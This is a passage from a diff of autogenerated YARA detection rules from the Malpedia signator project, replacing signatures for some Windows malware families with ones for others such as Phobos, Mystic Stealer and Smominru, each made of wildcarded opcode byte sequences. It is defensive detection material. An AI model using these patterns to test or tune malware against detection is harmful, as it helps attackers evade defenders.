8d7d51 57 56 ff95b10f0000 ab } + $sequence_25 = { 33d2 56 e8???????? 8a9435dec44600 5e 84c0 8bfa } + $sequence_26 = { 56 33d2 898ddcfeffff 40 57 } + $sequence_27 = { 6808020000 6a00 56 c745fc00010000 e8???????? 83c40c 8d45fc } + $sequence_28 = { ebab c745e428614000 817de42c614000 7311 8b45e4 } + $sequence_29 = { 6a00 6a00 8d8df8feffff 51 8d95f0fcffff } + $sequence_30 = { 68???????? 8d8df0faffff 51 ffd6 8b35???????? } + $sequence_31 = { 51 6689442414 e8???????? 6808020000 8d942420020000 6a00 } + $sequence_32 = { e8???????? 8a8c30a6c44600 5e 8b442414 03ca 03c1 89442414 } + $sequence_33 = { 33c0 56 51 668985e8fdffff e8???????? } + $sequence_34 = { 488bda 488b15???????? 4889442458 89442450 488b05???????? 482bc2 } + $sequence_35 = { 48ffc9 48ffc1 7440 488d542448 458d4e2e } + $sequence_36 = { 8bd9 e8???????? 4885c0 7509 488d051f390100 } + $sequence_37 = { 4883ec20 488bd9 e8???????? 4c8d1d4b9b0000 } + $sequence_38 = { 488b01 8b08 ff15???????? 488d15f3170100 488bcb } + $sequence_39 = { e8???????? 59 3bc7 59 a3???????? 7419 68???????? } + $sequence_40 = { 743e 8305????????20 8d0c9de0a30010 8d9080040000 8901 3bc2 } + $sequence_41 = { 4885c0 7438 33c0 4883c9ff 4c8d8600010000 488bfb } + $sequence_42 = { 8d04c0 8b0c8de0a30010 8a448104 83e040 c3 55 8bec } + $sequence_43 = { 83c410 837dfc08 752f 68???????? 53 e8???????? } + $sequence_44 = { 448d5bf0 498d4e10 4963d3 4d8bcd 4d8bc4 } + $sequence_45 = { 8b8fa8af0100 488b87a0af0100 400fb6d6 f6d2 881401 ff87a8af0100 8b97a8af0100 } + $sequence_46 = { 59 8a4dff 8d3c85e0a30010 8bc3 80c901 83e01f 884d0b } + $sequence_47 = { 488905???????? 8905???????? 488b05???????? 4533c0 48c7c102000080 488905???????? } + $sequence_48 = { 8bc3 c1f905 83e01f 8b0c8de0a30010 8d04c0 } + $sequence_49 = { 8b442448 448b6e4c 448b7e44 c1e808 4c8bf3 8b5e48 } condition: - 7 of them and filesize <139264 + 7 of them and filesize <330752 } -rule MALPEDIA_Win_Jessiecontea_Auto : FILE +rule MALPEDIA_Win_Mystic_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "526b090a-a995-58b5-b843-1e70dd71cefc" + id = "677c1a33-ba88-5fd2-bb60-e482ebad5ee5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jessiecontea_auto.yar#L1-L165" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mystic_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mystic_stealer_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "c68c31b644ea8b3e7ca9f4e4366853343f61b6640765616026487f548092899b" + logic_hash = "7ef3f130d7f708fe480ce6294f73f2aa94b8d0f4c6423ffb91a1e80eb925cec4" score = 75 quality = 75 tags = "FILE" @@ -177446,38 +180243,32 @@ rule MALPEDIA_Win_Jessiecontea_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c78590f4ffff00000000 c7858cf4ffff00000000 c78588f4ffff00000000 c78594f4ffff01000000 c78598f4ffff01000000 e8???????? } - $sequence_1 = { 3d00010000 0f8f03010000 6a00 6a00 50 } - $sequence_2 = { 8d85e8fdffff 50 8d85a2f6ffff 50 } - $sequence_3 = { 57 8b7d18 8945c0 8b4510 } - $sequence_4 = { eb02 2bf7 6a00 8d85e8b7ffff 50 } - $sequence_5 = { 5d c3 c705????????31090000 5f 5e 5b 8be5 } - $sequence_6 = { 56 57 680a020000 8d85d8fbffff 8bf2 6a00 } - $sequence_7 = { 6880000000 6a01 6a00 6a01 6800000040 8d85f8fbffff 50 } - $sequence_8 = { 41b800080000 be20000008 e8???????? 33d2 448975c0 } - $sequence_9 = { 4d8bc8 4d2bcd 6690 488d82fafeff7f } - $sequence_10 = { 83e03f 2bc8 33c0 48d3c8 488d0d39d20100 4833c2 } - $sequence_11 = { 7305 44887c3710 488bcb e8???????? 397d50 7230 } - $sequence_12 = { ff15???????? 85c0 0f8580fcffff 488b4c2460 } - $sequence_13 = { 892d???????? 8b1d???????? 488d4c2430 8bfd 48896c2430 } - $sequence_14 = { 4889442440 33d2 4489742448 41b8ff3f0000 488d8d51070000 } - $sequence_15 = { 488b4d98 488d4588 4889442428 41b902000000 } + $sequence_0 = { 8b461c 42 8b4e08 895614 8a4007 88040a 8b5614 } + $sequence_1 = { 0fb7c7 eb0b 8d4203 8986bc160000 } + $sequence_2 = { 6a02 5d 8b4774 3d06010000 } + $sequence_3 = { 0fb7d8 668bc3 66d3e0 660bc6 0fb7c0 } + $sequence_4 = { eb15 8d4503 8987bc160000 8d4304 } + $sequence_5 = { 668b476c 66890451 85f6 741a 8b4f6c } + $sequence_6 = { 668bc2 8d5f14 66d3e0 8b0b 660bc6 } + $sequence_7 = { eb0c 8d5103 0fb7c0 8996bc160000 0fb7c8 } + $sequence_8 = { 8a86b9160000 88040a b110 2a8ebc160000 8b86bc160000 ff4614 } + $sequence_9 = { 02c2 03cb 0fb6c0 8a843800010000 } condition: - 7 of them and filesize <413696 + 7 of them and filesize <512000 } -rule MALPEDIA_Win_Marap_Auto : FILE +rule MALPEDIA_Win_Phobos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2cc3d8fa-aa39-5bef-af3b-a091606785c2" + id = "b3fdfb89-c1ef-5439-9836-c8e32a8398db" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.marap_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.phobos_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "981ff96ccf9321bc9cf0b93466d635ede7fbc6c0341e04e670ea58028783ac37" + logic_hash = "2c179588b445524a4924d6ad3214734291e040f7e6e3be29f272840c2a179aff" score = 75 quality = 75 tags = "FILE" @@ -177491,32 +180282,32 @@ rule MALPEDIA_Win_Marap_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 8386e41d000002 e9???????? 8386e41d000003 } - $sequence_1 = { 7409 8386e41d000008 eb2f 84c0 7908 018ee41d0000 } - $sequence_2 = { ff15???????? 8bf0 89b59cfbffff 83feff 7472 } - $sequence_3 = { ff15???????? 85c0 7425 8b480c 8b11 8b02 } - $sequence_4 = { 81fb00040000 737e 8bc7 8bd7 668b08 } - $sequence_5 = { 0fbe84c1f8cb0010 6a07 c1f804 59 } - $sequence_6 = { 83c40c 8d7bfe 668b4702 83c702 6685c0 75f4 } - $sequence_7 = { 8d1c8580320110 8b03 83e71f c1e706 8a4c3824 } - $sequence_8 = { 8d4310 8d8954f40010 5a 668b31 } - $sequence_9 = { 80f901 0f8487000000 6683fa06 7519 84c0 } + $sequence_0 = { ff75fc e8???????? 59 85c0 0f845c010000 395df8 0f8453010000 } + $sequence_1 = { 59 8d4c0002 8bc7 2bc6 03c1 894ddc 897dd0 } + $sequence_2 = { 8d5c3801 e8???????? 59 8945fc 8975e4 ff15???????? 6a40 } + $sequence_3 = { 752e 6683f930 7409 c7450c0a000000 } + $sequence_4 = { 53 56 c745a044000000 ff15???????? 8945fc 3bc6 } + $sequence_5 = { 8bf8 57 897de0 e8???????? 83c40c 680a020000 8d5c3801 } + $sequence_6 = { 8d45f4 50 53 ff15???????? 56 8b35???????? ffd6 } + $sequence_7 = { 8bf3 2b7010 e8???????? f6472801 8d440006 59 8945fc } + $sequence_8 = { 7423 a900040000 7518 8b06 ff750c 8b00 ff7020 } + $sequence_9 = { 83c602 0fb716 83c702 6685d2 75e0 668b06 663b07 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <139264 } -rule MALPEDIA_Win_Carberp_Auto : FILE +rule MALPEDIA_Win_Mailto_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ca3e7da8-ad9c-59f4-8614-8b1382409083" + id = "ea0d0ed3-d3ad-5738-b388-39bdea82080a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.carberp_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mailto_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "1e5a666bd6ef8c024c58bd150c2d57a0675cba836a8af1e051301be69118758b" + logic_hash = "f253c860f2dfd876ea6c63e66e3d4bfe3e95a5b5178079f30b977b373576f89e" score = 75 quality = 75 tags = "FILE" @@ -177530,32 +180321,32 @@ rule MALPEDIA_Win_Carberp_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b8???????? 50 6a00 50 e8???????? 8b4518 8945e4 } - $sequence_1 = { 68f5a40f7d 6a0d 6a00 e8???????? 68da6772c2 6a0d 6a00 } - $sequence_2 = { ff75fc 56 ff15???????? 8bf0 8d45f8 50 e8???????? } - $sequence_3 = { 0f848d000000 6683f832 0f8483000000 6683f821 0f8548010000 57 8d8588fdffff } - $sequence_4 = { 7407 50 e8???????? 59 ff45f4 8b45f4 3b45f0 } - $sequence_5 = { 668945f6 58 6a72 668945f8 58 6a5c 668945fa } - $sequence_6 = { ff7658 e8???????? 83c418 83665800 5e 5d c3 } - $sequence_7 = { 59 59 85f6 7419 ff7510 56 6a04 } - $sequence_8 = { 6800000040 ff7508 ffd0 8bf8 83ffff 7504 33c0 } - $sequence_9 = { c645f867 c645f96c c645fa57 c645fb6e c645fc64 885dfd 895dc8 } + $sequence_0 = { 47 3bfb 7297 8b44241c 8930 8b442420 85c0 } + $sequence_1 = { 83c404 85f6 7429 85ed 7419 8b742414 } + $sequence_2 = { 8b442418 8938 8b44241c 85c0 7402 8930 } + $sequence_3 = { 55 56 57 8b7c2424 c744241400000000 85ff 7457 } + $sequence_4 = { 85f6 0f8477010000 e8???????? 3b7014 0f8469010000 8b0d???????? 85c9 } + $sequence_5 = { 8b08 ff5130 85c0 7822 ff74242c e8???????? } + $sequence_6 = { 897c242c 8bc8 89442420 c1f81a c1f91f 23c8 8bc1 } + $sequence_7 = { 40 eb64 83ff01 7522 0fb6d1 bf02000000 83e203 } + $sequence_8 = { 0fb6466b 884118 0fb6466f 88411c 0fb64652 884101 0fb64656 } + $sequence_9 = { 0f84ef000000 6a20 e8???????? 83c404 89442410 85c0 } condition: - 7 of them and filesize <491520 + 7 of them and filesize <180224 } -rule MALPEDIA_Win_Milkmaid_Auto : FILE +rule MALPEDIA_Win_Loup_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7c60d500-9a52-5cea-8bfb-4d836c40072e" + id = "f9d1b576-d285-5231-afcb-2e4f16800d77" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.milkmaid_auto.yar#L1-L100" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.loup" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.loup_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "c4a5987f68f519192a013c67faec02935457872f835e55aadbf7cdc1a7483580" + logic_hash = "ff0573e37f479d8813fb50aaed8f812906a0bad4de56fabb213fa961c6890498" score = 75 quality = 75 tags = "FILE" @@ -177569,30 +180360,32 @@ rule MALPEDIA_Win_Milkmaid_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7440 56 ff15???????? 8d4c2414 } - $sequence_1 = { c68424dc28010002 e8???????? 8d4c2410 c68424dc28010001 } - $sequence_2 = { 50 53 ff15???????? 8d4c2478 c68424dc28010002 } - $sequence_3 = { 6a00 ff15???????? 6aff 8d4c2408 e8???????? 68???????? 8d4c2408 } - $sequence_4 = { 895c2428 7513 8b5508 52 53 } - $sequence_5 = { 8d442408 57 50 e8???????? 83c404 33db } - $sequence_6 = { 8be9 896c2420 8a8528280100 84c0 7528 8b4d04 } - $sequence_7 = { 51 8d8c2480000000 c68424e428010003 e8???????? b911000000 } + $sequence_0 = { 83c404 85c0 741c 0fb745f4 50 e8???????? } + $sequence_1 = { 81781422059319 740c 8b4dfc 81791400409901 7522 e8???????? 8b55fc } + $sequence_2 = { 8b0d???????? 898dc8fbffff 8b15???????? 8995ccfbffff a1???????? 8985d0fbffff } + $sequence_3 = { 8b85d0f1ffff 53 56 ff3485647b4100 50 } + $sequence_4 = { 8b7508 57 85d2 744f 33ff 393a } + $sequence_5 = { 81f247656e75 b804000000 6bc803 8b440de0 35696e6549 } + $sequence_6 = { 8b4df4 84c0 0f84defeffff c745dc01000000 e9???????? 5f 5e } + $sequence_7 = { 668945e8 33c0 668945ea c745ee01000000 b804000000 668945ec } + $sequence_8 = { b804000000 c1e002 c784055cffffff01000000 8d855cffffff 8945d5 } + $sequence_9 = { 85c0 7443 0fb745f4 50 } condition: - 7 of them and filesize <65536 + 7 of them and filesize <257024 } -rule MALPEDIA_Win_Ratel_Auto : FILE +rule MALPEDIA_Win_Tonedeaf_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0998b123-774e-59b1-8ca2-1a95e1fb9bf7" + id = "5115d077-589f-5849-9e66-466eacfeb8fa" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratel" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ratel_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tonedeaf_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "32361790b47e0503007c9763001c72d5f3f0666a6e89a8bab7c3bc0bd295eb6a" + logic_hash = "05f38897859076fdc96710dcc7b02a4e168a1e7a497536a51feb5fc01846d4dd" score = 75 quality = 75 tags = "FILE" @@ -177606,32 +180399,32 @@ rule MALPEDIA_Win_Ratel_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89d9 e8???????? 85c0 75e7 89d9 e8???????? 89d9 } - $sequence_1 = { a1???????? 85c0 0f85bb010000 8b41fc 8d50ff 8951fc } - $sequence_2 = { 8b442454 8b542414 8b400c 85d2 0f851f040000 83f802 } - $sequence_3 = { 8bbc24b0000000 e8???????? 8b00 c744245cffffffff c7442460ffffffff 89442428 8b8424a4000000 } - $sequence_4 = { 0f83a3020000 0fb700 6683f8ff b800000000 0f4545ac 8945ac b800000000 } - $sequence_5 = { 668993f0000000 c783f400000000000000 c783f800000000000000 c783fc00000000000000 c7830001000000000000 c703???????? c7437c98ce4b00 } - $sequence_6 = { c703???????? c7437884124c00 e8???????? 89b3f0000000 83ec04 8d65f4 5b } - $sequence_7 = { 0f9fc1 084dc9 8b4d08 8345cc01 8b4108 3b410c 0f8240ffffff } - $sequence_8 = { 8b4340 c7431400000000 c7431000000000 0fb67b58 894304 894308 89430c } - $sequence_9 = { 8d4304 89c1 89c6 e8???????? 89b3ec000000 83ec04 8d65f4 } + $sequence_0 = { ff15???????? 56 ff15???????? 56 ff15???????? 56 e8???????? } + $sequence_1 = { 2bf1 8bc3 46 d1e8 } + $sequence_2 = { 8bc3 46 d1e8 33d2 } + $sequence_3 = { 8b45ec 85c0 740b 6a08 50 } + $sequence_4 = { 884c32ff 84c9 75f3 8bf3 8a03 43 84c0 } + $sequence_5 = { 8b5004 8d4af8 898c153cffffff 8d45a8 c745fc01000000 50 } + $sequence_6 = { 56 6a00 ff15???????? 56 ff15???????? 56 ff15???????? } + $sequence_7 = { 83f801 732f 8b0f 8bc1 } + $sequence_8 = { 0f57c0 c745dc00000000 33c0 660fd645d4 33db 8945d8 } + $sequence_9 = { 75f3 8bf3 8a03 43 84c0 75f9 } condition: - 7 of them and filesize <2174976 + 7 of them and filesize <851968 } -rule MALPEDIA_Win_Rerdom_Auto : FILE +rule MALPEDIA_Win_Attor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "26b21d13-90fc-5a47-a822-e7b7af65cf28" + id = "de68d27a-a7e8-5baa-94a2-9db640461043" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rerdom_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.attor_auto.yar#L1-L165" license_url = "N/A" - logic_hash = "f1628ed7c3a0f5463a2b7ad02b3e6deb2af0e74d20f58edaa325cbcbd6ff539b" + logic_hash = "9ffbefbd2b4397dd03e1eba42ffa85ea59dac9e4723a113680ffe4af7c4fe1e3" score = 75 quality = 75 tags = "FILE" @@ -177645,32 +180438,38 @@ rule MALPEDIA_Win_Rerdom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85f6 7425 8b550c b8???????? e8???????? 3bc7 } - $sequence_1 = { 89470c 8b4508 894708 eb1c 33db 53 } - $sequence_2 = { 8b44240c 21b0cc000000 21b0d0000000 8bd8 8d842412060000 50 83ceff } - $sequence_3 = { e9???????? 83f801 7533 8b4e04 8b97d0000000 8b4608 } - $sequence_4 = { e8???????? 53 a3???????? 57 8bc6 e8???????? 5f } - $sequence_5 = { 8b742430 8d4618 50 8d4c2428 e8???????? 84c0 741e } - $sequence_6 = { 7527 8b4510 85c0 7405 } - $sequence_7 = { 3bde 0f84c5000000 8b430c 3bc6 0f84ba000000 897510 8b00 } - $sequence_8 = { 8b450c e8???????? 8945e4 85c0 7427 8365fc00 ff750c } - $sequence_9 = { 41 66890456 0fb7044b 6685c0 75ec 8bc3 } + $sequence_0 = { 83f801 7411 3d81000000 740a } + $sequence_1 = { 33c0 488b6c2450 4883c420 415c 5f 5e } + $sequence_2 = { 488b8c24b0000000 4c8b642468 4885c9 7402 8919 408ac5 } + $sequence_3 = { 488b8c2490000000 4885c9 0f8441020000 41b802000000 8bd5 ff15???????? 85c0 } + $sequence_4 = { 48395c2430 0f8447010000 b101 e8???????? } + $sequence_5 = { 48c744243000000000 7414 33c9 e8???????? 488b8c2490000000 } + $sequence_6 = { 7435 488b442440 488b8c2490000000 4533c0 418d5002 4d8bcf } + $sequence_7 = { 4533c0 4d8bcc 418d5002 44896c2420 ff15???????? } + $sequence_8 = { 8b4c2418 50 55 8b2d???????? 6a00 } + $sequence_9 = { 740a 83f808 7405 83f811 } + $sequence_10 = { 56 ff15???????? 8d4c2418 8d54241c 51 52 } + $sequence_11 = { 83c408 eb06 8b35???????? 897c241c 8b7c2420 85ff } + $sequence_12 = { 83c40c 89442420 85c0 0f842b010000 8b4c2430 8d7108 } + $sequence_13 = { 85c0 0f840c010000 8b54241c 57 52 } + $sequence_14 = { 897504 c644241301 740a 8b4c2418 } + $sequence_15 = { 8b44243c 3bc7 7434 8b54241c } condition: - 7 of them and filesize <352256 + 7 of them and filesize <2023424 } -rule MALPEDIA_Win_Zxxz_Auto : FILE +rule MALPEDIA_Win_Smominru_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "47a6bdd7-280d-5812-824e-6730815c0329" + id = "f9ca05ba-f03e-5436-9d57-424a2dfc3ab2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxxz" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zxxz_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.smominru_auto.yar#L1-L162" license_url = "N/A" - logic_hash = "1197698292204c5d5bb6df77b7c0541f4794374692dc94417033752fb1a653dc" + logic_hash = "bda67966371ffe5669f600e524bbc69b988d40d47c3737672a3d574c8f6a0cdf" score = 75 quality = 75 tags = "FILE" @@ -177684,32 +180483,38 @@ rule MALPEDIA_Win_Zxxz_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 40 84c9 75ef bf???????? e8???????? 84c0 } - $sequence_1 = { 8b4c244c 64890d00000000 59 5f 5e 5d 8b4c2434 } - $sequence_2 = { be04010000 51 89742424 6689842424010000 e8???????? } - $sequence_3 = { 84c9 75f9 2bc2 8bd0 33c0 33c9 } - $sequence_4 = { c3 81ecc4010000 a1???????? 33c4 898424bc010000 } - $sequence_5 = { 7424 8b1d???????? 8d54242c 57 } - $sequence_6 = { ff15???????? 85c0 7539 3805???????? } - $sequence_7 = { 7403 8811 41 40 803800 75f0 } - $sequence_8 = { 681c020000 68???????? ffd6 83c40c 68???????? } - $sequence_9 = { ff15???????? 8b3d???????? 8bf0 56 6a01 } + $sequence_0 = { 8b474c 894610 8b4750 894614 8b4754 894618 } + $sequence_1 = { 0fb7c0 8d4dac 51 50 6a01 } + $sequence_2 = { 8bd8 eb06 3b4628 0f94c3 } + $sequence_3 = { 0f84694ac17b f6c140 0f856f4ac17b 8ad1 80e23f } + $sequence_4 = { 8bd8 eb06 47 ff4df0 } + $sequence_5 = { 8bd8 eb02 b301 8bc7 } + $sequence_6 = { 8bd8 eb06 ff45f0 4f } + $sequence_7 = { 8bd8 eb02 33db 837dfc00 } + $sequence_8 = { 6aff e8???????? 85c0 0f8c05e5c07b } + $sequence_9 = { ff15???????? 3d03010000 0f8447a0b17b 85c0 0f8c3fa0b17b } + $sequence_10 = { 8b37 8975e0 85f6 0f842bfebb7b 83feff 0f8422febb7b 8b5f14 } + $sequence_11 = { 8bd8 eb09 55 e8???????? 59 } + $sequence_12 = { 0f8c21f7b07b 0fbe75f4 6bf630 e8???????? 8b402c 648b0d18000000 56 } + $sequence_13 = { 0f8c79feab7b 8d45c4 50 e8???????? 8b45f0 } + $sequence_14 = { 8bd8 e9???????? 8d4df8 8bd7 8bc6 e8???????? 8d4df4 } + $sequence_15 = { 8bd8 eb0a 8d45f0 e8???????? } condition: - 7 of them and filesize <4142080 + 7 of them and filesize <8167424 } -rule MALPEDIA_Win_Pushdo_Auto : FILE +rule MALPEDIA_Win_Grease_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ad774ebd-627a-5818-9f5f-1b251e52fd7e" + id = "adc1cb70-ca80-5648-8c82-afd04a5873d7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pushdo_auto.yar#L1-L208" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grease_auto.yar#L1-L230" license_url = "N/A" - logic_hash = "daece01a3a8065197470b42fa0923405b1cfbd8c63e62002ad7e9af51850eb51" + logic_hash = "3adaa81800887e757966a0f8096c9ffe86dfca2fec47d710b3b77554cf1c8228" score = 75 quality = 73 tags = "FILE" @@ -177723,43 +180528,45 @@ rule MALPEDIA_Win_Pushdo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ff15???????? 33d2 b9ffff0000 } - $sequence_1 = { f7f9 33c9 ba88020000 f7e2 0f90c1 } - $sequence_2 = { 8b45fc b10b d3c0 61 } - $sequence_3 = { 81ec18010000 6800010000 6a00 8d85f0feffff } - $sequence_4 = { 736a 8b45fc 0fbe8c05f0feffff 038de8feffff 8b45fc } - $sequence_5 = { 0fbe1410 03ca 81e1ff000000 898de8feffff 8b85e8feffff 8a8c05f0feffff } - $sequence_6 = { c785e8feffff00000000 c745f400000000 c745fc00000000 eb09 8b55fc 83c201 8955fc } - $sequence_7 = { 33d1 8b450c 0345fc 8810 e9???????? } - $sequence_8 = { e8???????? 83c41c 85c0 7503 8975fc } - $sequence_9 = { 53 53 894808 8b4e14 50 } - $sequence_10 = { 53 6a18 ffd6 ffb5f4f7ffff 8d85f4fbffff 50 } - $sequence_11 = { 0fb6c3 6a03 33d2 5f f7f7 } - $sequence_12 = { 8d45ec 50 8d4598 50 57 57 } - $sequence_13 = { 52 8d8588fbffff 50 e8???????? } - $sequence_14 = { a1???????? 6bc00a 057f0a0000 33d2 b9a1190000 f7f1 } - $sequence_15 = { e8???????? 89859cd3ffff 83bd9cd3ffff00 0f8ea0000000 8d8550d3ffff 50 } - $sequence_16 = { 3b4dd8 7f28 8b55e4 3b55d8 0f85cf000000 8b45d8 } - $sequence_17 = { 81bd5cfeffff70170000 0f83e2010000 8b855cfeffff 33d2 b964000000 f7f1 85d2 } - $sequence_18 = { ff55e4 8945c8 eb11 8b4dd4 } - $sequence_19 = { 83c404 c1e002 8945e4 8b4de4 } - $sequence_20 = { 50 8b4dfc 51 e8???????? 85c0 7c3b 8b55f0 } + $sequence_0 = { 52 50 683f000f00 50 50 50 } + $sequence_1 = { 488b4c2460 ff15???????? b801000000 488b8c2480020000 4833cc e8???????? 4881c490020000 } + $sequence_2 = { 4533c0 488bd3 c744242804000000 4889442420 ff15???????? 488b4c2450 ff15???????? } + $sequence_3 = { 488b05???????? 4833c4 4889842480020000 488d4c2472 } + $sequence_4 = { c74424281f000200 895c2420 ff15???????? 85c0 0f85e7000000 } + $sequence_5 = { 4533c9 48897c2440 4889442438 48897c2430 } + $sequence_6 = { 48895c2440 48895c2458 895c2460 48895c2468 } + $sequence_7 = { 4889442438 48897c2430 4533c0 c74424283f000f00 897c2420 ff15???????? 85c0 } + $sequence_8 = { 488b4c2450 488d442458 41b904000000 4533c0 488bd3 } + $sequence_9 = { 55 68000000c0 50 ff15???????? 8bf0 } + $sequence_10 = { e9???????? c684342c08000023 e9???????? c684342c08000021 e9???????? c684342c08000025 } + $sequence_11 = { 51 683f000f00 6a00 8d542424 52 6802000080 ffd7 } + $sequence_12 = { 85c0 7540 8d542420 52 8b542414 } + $sequence_13 = { 83c001 3acb 75f7 8b2d???????? } + $sequence_14 = { 83c404 85f6 8854240c 8d46ff 7412 8a4c040c } + $sequence_15 = { e9???????? c684341001000066 e9???????? c684341001000068 e9???????? } + $sequence_16 = { e8???????? 8b0d???????? 51 8d542418 } + $sequence_17 = { e9???????? c6440c082b e9???????? c6440c083e e9???????? c6440c083d e9???????? } + $sequence_18 = { c68434240600003f eb12 c68434240600002e eb08 } + $sequence_19 = { 8a08 40 84c9 7405 46 85c0 } + $sequence_20 = { 8b9c2418040000 56 57 b90d000000 be???????? } + $sequence_21 = { 50 897c2430 ffd5 8b542410 6a04 8d4c241c 51 } + $sequence_22 = { 8d942434010000 52 56 ffd7 b83b000000 53 668984242c010000 } condition: - 7 of them and filesize <163840 + 7 of them and filesize <278528 } -rule MALPEDIA_Win_Lightwork_Auto : FILE +rule MALPEDIA_Win_Clipog_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c390e16c-2dcc-559e-9fd3-76f19a07f767" + id = "46aafcb1-e1b8-5042-a65a-96aaea69b545" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightwork" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lightwork_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clipog" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.clipog_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "61817aa90179df111fa397aa30e99207b20a485779bb2cd0f0c3ecbb28869217" + logic_hash = "d53a5689475b1eada9174cbb0eba62d34ac88574fbde919bc04ba3774f961a03" score = 75 quality = 75 tags = "FILE" @@ -177773,32 +180580,32 @@ rule MALPEDIA_Win_Lightwork_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb7442462 89442404 8b442464 890424 e8???????? } - $sequence_1 = { c3 55 89e5 83ec38 8b4508 83c07c 8945f0 } - $sequence_2 = { e8???????? 894508 837d0800 740b 8b4508 890424 } - $sequence_3 